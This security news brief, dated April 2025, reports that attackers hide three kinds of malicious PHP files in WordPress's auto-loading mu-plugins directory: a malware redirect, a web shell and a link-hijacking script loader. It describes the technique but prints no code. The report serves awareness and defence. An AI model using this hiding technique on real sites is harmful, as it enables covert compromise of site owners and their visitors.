Hackers abuse MU plugins to inject malicious payloads to WordPress

📟 News

Date: 01/04/2025

According to Sucuri, hackers store malicious code in the MU-plugins (Must-Use Plugins) directory in WordPress and execute it while remaining undetected.

The technique was first discovered in February 2025, but its spread rate is continuously growing, and currently attackers abuse MU plugins to run three different types of malicious code.

Must-Use Plugins represent a special type of WordPress plugins that run every time the page is loaded and don’t require activation in the Admin Panel. These PHP files are stored in the wp-content/mu-plugins/ directory, are executed automatically, and don’t appear in the Admin Panel on the Plugins page unless the Must-Use filter is selected.

Among other things, such plugins are used to enforce custom security rules across the website, boost performance, dynamically modify variables, etc.

Since MU plugins are executed on every page load and don’t appear in the standard plugin list, they can be used to covertly perform a wide range of malicious operations (e.g. steal credentials, inject malicious code, or modify HTML output).

Sucuri experts discovered three different payloads placed by cybercriminals to the MU-plugins directory:

  • redirect.php redirects visitors (excluding bots and logged in admins) to the malicious website updatesnow[.]net that displays a fake browser update prompt to trick the victim into downloading malware;
  • index.php is a web shell that acts as a backdoor by downloading and executing PHP code from a GitHub repository; and 
  • custom-js-loader.php loads JavaScript that replaces all images on the website with explicit content, hijacks all external links, and opens fraudulent pop-ups instead.

The most dangerous payload is the web shell since it enables attackers to remotely execute commands on the server, steal data, and deliver subsequent attacks on resource users and visitors.

The other two malware samples are more likely to damage the website’s reputation and its SEO rankings due to suspicious redirects and attempts to install malware on visitors’ computers.

The infection technique used by the malefactors remains unknown yet. Its assumed that the attackers exploit known vulnerabilities in WordPress plugins and themes or weak admin credentials.

Related posts:
2025.02.18 — Chrome Enhanced Protection mode is now powered by AI

The Enhanced Protection mode in Google Chrome has been updated. Now it uses AI to protect users from dangerous sites, downloads, and extensions in real time.…

Full article →
2025.03.28 — Zero-day vulnerability in Windows results in NTLM hash leaks

Security experts reported a new zero-day vulnerability in Windows that enables remote attackers to steal NTLM credentials by tricking victims into viewing malicious files in Windows…

Full article →
2025.02.06 — Let's Encrypt to stop sending expiration notification emails

The nonprofit organization announced that, starting June 4, 2025, it will stop sending expiration notification emails to subscribers. The primary reason behind this decision…

Full article →
2025.04.23 — Improper authentication control vulnerability affects ASUS routers with AiCloud

ASUSTeK Computer Inc. fixed an improper authentication control vulnerability in routers with AiCloud. The bug allows remote attackers to perform unauthorized actions on vulnerable devices. The issue…

Full article →
2025.04.30 — Coinbase fixes 2FA bug that made customers panic

Cryptocurrency exchange Coinbase has fixed a bug in its Account Activity logs that caused customers to think their credentials were compromised. Earlier this month, BleepingComputer…

Full article →
2025.01.24 — Hundreds of websites impersonating Reddit and WeTransfer spread Lumma Stealer

Sekoia researcher crep1x discovered that hackers are currently using some 1,000 pages impersonating Reddit and WeTransfer. Victims visiting these sites are tricked into…

Full article →
2025.02.08 — Hackers exploit RCE vulnerability in Microsoft Outlook

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) warned Federal Civilian Executive Branch (FCEB) Agencies that they have to secure their systems from ongoing…

Full article →
2025.04.12 — Hackers compromised a bureau within the U.S. Department of the Treasury and spent months in hacked systems

The Office of the Comptroller of the Currency (OCC), an independent bureau within the United States Department of the Treasury, reported a major cybersecurity incident. Unknown attackers had…

Full article →
2025.04.07 — Critical RCE vulnerability discovered in Apache Parquet

All versions of Apache Parquet up to and including 1.15.0 are affected by a critical remote code execution (RCE) vulnerability whose CVSS score is 10 out…

Full article →
2025.01.26 — Cisco patched a critical vulnerability in Meeting Management

Cisco released updates to fix a critical (CVSS score: 9.9) vulnerability in Meeting Management. The bug enables an unprivileged remote authenticated attacker to gain administrative privileges. The vulnerability…

Full article →